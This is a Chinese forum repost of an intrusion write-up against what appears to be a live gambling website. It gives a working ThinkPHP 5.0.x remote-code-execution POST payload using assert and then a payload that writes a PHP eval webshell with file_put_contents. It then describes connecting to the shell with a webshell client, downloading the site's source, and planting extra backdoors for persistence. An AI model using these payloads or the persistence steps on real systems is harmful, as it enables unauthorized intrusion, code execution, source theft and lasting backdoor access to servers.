安全矩阵

 找回密码
 立即注册
搜索
查看: 2437|回复: 0

简单的BC站点getshell

[复制链接]

991

主题

1063

帖子

4315

积分

论坛元老

Rank: 8Rank: 8

积分
4315
发表于 2021-3-17 22:27:37 | 显示全部楼层 |阅读模式
原文链接:简单的BC站点getshell

原文链接;https://xz.aliyun.com/t/9232               

最近来了点任务,做BC站,以前没做过只能碰碰运气!

确定目标
主站:



通过旁站:



信息收集
通过信息收集发现是个tp v5.0.9,此版本存在tp-rce漏洞。



直接通过payload进行测试,

Post:_method=__construct&filter[]=assert&method=get&get[]=phpinfo()
查找payload,直接打:

Post:_method=__construct&filter[]=assert&method=get&get[]=phpinfo()



发现是php 5.4.45版本的,

直接尝试getshell:



发现system被禁用,尝试其他系统命令的也一样。



查看phpinfo中desable_functions禁用了那些函数。



想办法怎么绕过进行写马(此处卡了我半天)
最后通过一位渗透小伙伴,想出下面的可以利用file_put_contents直接写shell,想了半天,忘了用其他函数进行直接写马就可以了,并不需要非得利用system命令进行写马,还是底层知识薄弱啊。再次感谢小伙伴!



getshell
构造payload:

_method=__construct&filter[]=assert&method=get&get[]=file_put_contents('a.php','<?php eval($_POST[a])?>')


写入成功,利用菜刀连接。



成功连接。
查看权限:



发现启动了远程安全模式。
想要绕过,发现很多函数被禁用,占未成功。
下载源码:



多部署一些后门,防止被删。


回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

小黑屋|安全矩阵

GMT+8, 2024-11-29 00:44 , Processed in 0.012481 second(s), 18 queries .

Powered by Discuz! X4.0

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表